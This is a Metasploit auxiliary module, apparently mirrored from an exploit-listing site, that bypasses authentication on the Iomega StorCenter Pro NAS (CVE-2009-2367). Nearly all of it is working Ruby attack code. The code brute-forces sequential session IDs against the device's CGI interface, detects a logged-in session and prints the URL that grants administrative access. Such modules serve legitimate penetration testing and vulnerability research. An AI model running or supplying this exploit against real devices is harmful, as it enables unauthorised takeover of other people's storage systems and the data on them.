Share
## https://sploitus.com/exploit?id=PACKETSTORM:180870
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize  
super(  
'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass',  
'Description' => %q{  
The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,  
allowing for simple brute force attacks to bypass authentication and gain administrative  
access.  
},  
'References' => [  
[ 'OSVDB', '55586' ],  
[ 'CVE', '2009-2367' ],  
],  
'Author' => [ 'aushack' ],  
'License' => MSF_LICENSE  
)  
  
register_options(  
[  
OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100])  
]  
)  
end  
  
def run  
datastore['SID_MAX'].times do |x|  
print_status("Trying session ID #{x}")  
  
res = send_request_raw({  
'uri' => "/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}",  
'method' => 'GET'  
}, 25)  
  
if (res && res.to_s =~ (/Log out/))  
print_status("Found valid session ID number #{x}!")  
print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}")  
break  
end  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout  
print_error("Unable to connect to #{rhost}:#{rport}")  
break  
rescue ::Timeout::Error, ::Errno::EPIPE  
end  
end  
end